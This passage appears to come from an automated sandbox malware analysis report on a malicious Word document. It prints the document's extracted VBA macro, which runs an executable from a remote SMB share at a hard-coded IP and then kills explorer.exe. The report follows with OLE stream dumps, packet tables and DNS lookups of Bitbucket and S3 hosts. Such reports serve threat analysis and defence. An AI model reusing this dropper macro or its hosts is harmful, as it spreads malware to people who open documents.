    FASFASFHBNVNVB = "\\89.23.98.22\LN\"
    ireowrppqwcxva = "GB.exe"
    
    ' ????????? ????? ? ??????????
    Call Shell("explorer.exe """ & FASFASFHBNVNVB & """", vbNormalFocus)
    
    ' ????????? ????????? ??? ????????
    RunExecutable
End Sub

Sub RunExecutable()
    Dim FASFASFHBNVNVB As String
    Dim ireowrppqwcxva As String
    
    ' ????????? ???? ? ????? ? ???????????? ?????
    FASFASFHBNVNVB = "\\89.23.98.22\LN\"
    ireowrppqwcxva = "GB.exe"
    
    ' ????????? ??????????? ???? ?? ?????
    Call Shell("""" & FASFASFHBNVNVB & ireowrppqwcxva & """", vbNormalFocus)
    Call Shell("powershell.exe -Command Stop-Process -Name explorer", vbHide)
End Sub

                                                            Streams

                                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                            General
                                                            Stream Path:\x1CompObj
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:114
                                                            Entropy:4.235956365095031
                                                            Base64 Encoded:True
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                            General
                                                            Stream Path:\x5DocumentSummaryInformation
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:4096
                                                            Entropy:0.2416851540298004
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                            General
                                                            Stream Path:\x5SummaryInformation
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:4096
                                                            Entropy:0.4449011682084879
                                                            Base64 Encoded:False
                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A d m i n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
                                                            Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00
                                                            Stream Path: 1Table, File Type: data, Stream Size: 7165
                                                            General
                                                            Stream Path:1Table
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:7165
                                                            Entropy:5.853461283905875
                                                            Base64 Encoded:True
                                                            Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
                                                            Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                            Stream Path: Data, File Type: data, Stream Size: 649041
                                                            General
                                                            Stream Path:Data
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:649041
                                                            Entropy:7.785142599441219
                                                            Base64 Encoded:True
                                                            Data ASCII:Q . . D . d . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . C . . . . . . A . . . . . . . . . . . . . . . . . . . . 6 . _ . 1 . . . . . . . . . . . . . R . . . . . . # 2 . . d ~ . . . . . . . D . . . . . . . F . . . # 2 . . d ~ . n E x i f . . M M . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . j . ( . . . . . . . . . . . 1 . . . . . . . . . r . 2 . . . . .
                                                            Data Raw:51 e7 09 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 80 2e c6 41 01 03 01 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 44 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 20 00 00 00 04 41 01 00 00 00 05 c1 08 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 36 00 5f 00
                                                            Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 422
                                                            General
                                                            Stream Path:Macros/PROJECT
                                                            CLSID:
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Stream Size:422
                                                            Entropy:5.379710895999521
                                                            Base64 Encoded:True
                                                            Data ASCII:I D = " { 5 D 6 A 1 2 2 E - 1 A 3 C - 4 8 7 3 - A 2 8 2 - D 7 C 7 F F C 3 A B 2 9 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 7 8 5 7 1 3 E F 3 C 6 3 C C A 3 C C A 3 C C A 3 C C A " . . D P B = " C C C E 3 A 8 1 3 A C 7 3 B C 7 3 B C 7 " . . G C = " 1 1 1 3 E 7 0 8 E 8 0 8 E 8 F 7 " . . . . [ H
                                                            Data Raw:49 44 3d 22 7b 35 44 36 41 31 32 32 45 2d 31 41 33 43 2d 34 38 37 33 2d 41 32 38 32 2d 44 37 43 37 46 46 43 33 41 42 32 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 61 63 72 6f 73 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22
                                                            Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 71
                                                            General
                                                            Stream Path:Macros/PROJECTwm
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:71
                                                            Entropy:3.3485999524807437
                                                            Base64 Encoded:False
                                                            Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . .
                                                            Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 77 4d 61 63 72 6f 73 00 4e 00 65 00 77 00 4d 00 61 00 63 00 72 00 6f 00 73 00 00 00 00 00
                                                            Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2622
                                                            General
                                                            Stream Path:Macros/VBA/_VBA_PROJECT
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:2622
                                                            Entropy:4.15417107322114
                                                            Base64 Encoded:False
                                                            Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
                                                            Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                            Stream Path: Macros/VBA/__SRP_0, File Type: data, Stream Size: 1452
                                                            General
                                                            Stream Path:Macros/VBA/__SRP_0
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:1452
                                                            Entropy:3.3996963922421832
                                                            Base64 Encoded:False
                                                            Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ ` . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . J V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                            Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                                                            Stream Path: Macros/VBA/__SRP_1, File Type: data, Stream Size: 122
                                                            General
                                                            Stream Path:Macros/VBA/__SRP_1
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:122
                                                            Entropy:1.4349250578778767
                                                            Base64 Encoded:False
                                                            Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
                                                            Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 6a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00
                                                            Stream Path: Macros/VBA/__SRP_2, File Type: data, Stream Size: 169
                                                            General
                                                            Stream Path:Macros/VBA/__SRP_2
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:169
                                                            Entropy:1.5733294272801635
                                                            Base64 Encoded:False
                                                            Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . S . . 4 . . . . . . . . . . . . . . .
                                                            Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 0c 00 00 00 00 00 00 12 00 00
                                                            Stream Path: Macros/VBA/__SRP_3, File Type: data, Stream Size: 156
                                                            General
                                                            Stream Path:Macros/VBA/__SRP_3
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:156
                                                            Entropy:1.5811533511839717
                                                            Base64 Encoded:False
                                                            Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                            Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                            Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 569
                                                            General
                                                            Stream Path:Macros/VBA/dir
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:569
                                                            Entropy:6.318529355416549
                                                            Base64 Encoded:True
                                                            Data ASCII:. 5 . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . t g . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * , \\ C . . . . p m . . A ! O f f i c g O D . f . i . c g .
                                                            Data Raw:01 35 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 74 b7 8e 67 0d 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                                            Stream Path: WordDocument, File Type: data, Stream Size: 4096
                                                            General
                                                            Stream Path:WordDocument
                                                            CLSID:
                                                            File Type:data
                                                            Stream Size:4096
                                                            Entropy:1.0467291214812393
                                                            Base64 Encoded:False
                                                            Data ASCII:. U . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j n n . . . . . . . . . . . . . . . . . . . . . . . . . . . a . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . .
                                                            Data Raw:ec a5 c1 00 55 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a eb 6e eb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 89 04 e9 61 89 04 e9 61 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 21, 2023 09:50:31.017278910 CET49164443192.168.2.22104.192.141.1
                                                            Dec 21, 2023 09:50:31.017301083 CET44349164104.192.141.1192.168.2.22
                                                            Dec 21, 2023 09:50:31.017385960 CET49164443192.168.2.22104.192.141.1
                                                            Dec 21, 2023 09:50:31.023325920 CET49164443192.168.2.22104.192.141.1
                                                            Dec 21, 2023 09:50:31.023340940 CET44349164104.192.141.1192.168.2.22
                                                            Dec 21, 2023 09:50:31.490077972 CET44349164104.192.141.1192.168.2.22
                                                            Dec 21, 2023 09:50:31.490178108 CET49164443192.168.2.22104.192.141.1
                                                            Dec 21, 2023 09:50:31.506215096 CET49164443192.168.2.22104.192.141.1
                                                            Dec 21, 2023 09:50:31.506227016 CET44349164104.192.141.1192.168.2.22
                                                            Dec 21, 2023 09:50:31.506494999 CET44349164104.192.141.1192.168.2.22
                                                            Dec 21, 2023 09:50:31.514344931 CET49164443192.168.2.22104.192.141.1
                                                            Dec 21, 2023 09:50:31.560734034 CET44349164104.192.141.1192.168.2.22
                                                            Dec 21, 2023 09:50:32.471883059 CET44349164104.192.141.1192.168.2.22
                                                            Dec 21, 2023 09:50:32.471954107 CET44349164104.192.141.1192.168.2.22
                                                            Dec 21, 2023 09:50:32.471987963 CET49164443192.168.2.22104.192.141.1
                                                            Dec 21, 2023 09:50:32.472142935 CET49164443192.168.2.22104.192.141.1
                                                            Dec 21, 2023 09:50:32.477267981 CET49164443192.168.2.22104.192.141.1

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 21, 2023 09:50:30.845541000 CET5789353192.168.2.228.8.8.8
                                                            Dec 21, 2023 09:50:31.006573915 CET53578938.8.8.8192.168.2.22
                                                            Dec 21, 2023 09:50:32.481947899 CET5482153192.168.2.228.8.8.8
                                                            Dec 21, 2023 09:50:32.640578985 CET53548218.8.8.8192.168.2.22
                                                            Dec 21, 2023 09:50:32.641305923 CET5482153192.168.2.228.8.8.8
                                                            Dec 21, 2023 09:50:32.799340963 CET53548218.8.8.8192.168.2.22
                                                            Dec 21, 2023 09:50:32.799592972 CET5482153192.168.2.228.8.8.8
                                                            Dec 21, 2023 09:50:32.959451914 CET53548218.8.8.8192.168.2.22
                                                            Dec 21, 2023 09:50:32.959691048 CET5482153192.168.2.228.8.8.8
                                                            Dec 21, 2023 09:50:33.118021965 CET53548218.8.8.8192.168.2.22
                                                            Dec 21, 2023 09:50:33.118211985 CET5482153192.168.2.228.8.8.8
                                                            Dec 21, 2023 09:50:33.279392958 CET53548218.8.8.8192.168.2.22

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 21, 2023 09:50:30.845541000 CET192.168.2.228.8.8.80x4537Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.481947899 CET192.168.2.228.8.8.80xaaa4Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.641305923 CET192.168.2.228.8.8.80xaaa4Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.799592972 CET192.168.2.228.8.8.80xaaa4Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.959691048 CET192.168.2.228.8.8.80xaaa4Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.118211985 CET192.168.2.228.8.8.80xaaa4Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 21, 2023 09:50:31.006573915 CET8.8.8.8192.168.2.220x4537No error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.640578985 CET8.8.8.8192.168.2.220xaaa4No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.640578985 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.640578985 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com54.231.199.241A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.640578985 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com3.5.27.139A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.640578985 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com52.216.40.49A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.640578985 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com16.182.106.73A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.640578985 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com3.5.25.234A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.640578985 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com54.231.139.153A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.640578985 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com3.5.27.104A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.640578985 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com52.216.34.177A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.799340963 CET8.8.8.8192.168.2.220xaaa4No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.799340963 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.799340963 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com54.231.199.241A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.799340963 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com3.5.27.139A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.799340963 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com52.216.40.49A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.799340963 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com16.182.106.73A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.799340963 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com3.5.25.234A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.799340963 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com54.231.139.153A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.799340963 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com3.5.27.104A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.799340963 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com52.216.34.177A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.959451914 CET8.8.8.8192.168.2.220xaaa4No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.959451914 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.959451914 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com54.231.171.25A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.959451914 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com16.182.35.145A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.959451914 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com52.217.163.113A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.959451914 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com54.231.228.249A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.959451914 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com52.217.113.217A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.959451914 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com3.5.24.104A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.959451914 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com3.5.2.232A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:32.959451914 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com3.5.28.21A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.118021965 CET8.8.8.8192.168.2.220xaaa4No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.118021965 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.118021965 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com54.231.171.25A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.118021965 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com16.182.35.145A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.118021965 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com52.217.163.113A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.118021965 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com54.231.228.249A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.118021965 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com52.217.113.217A (IP address)IN (0x0001)false
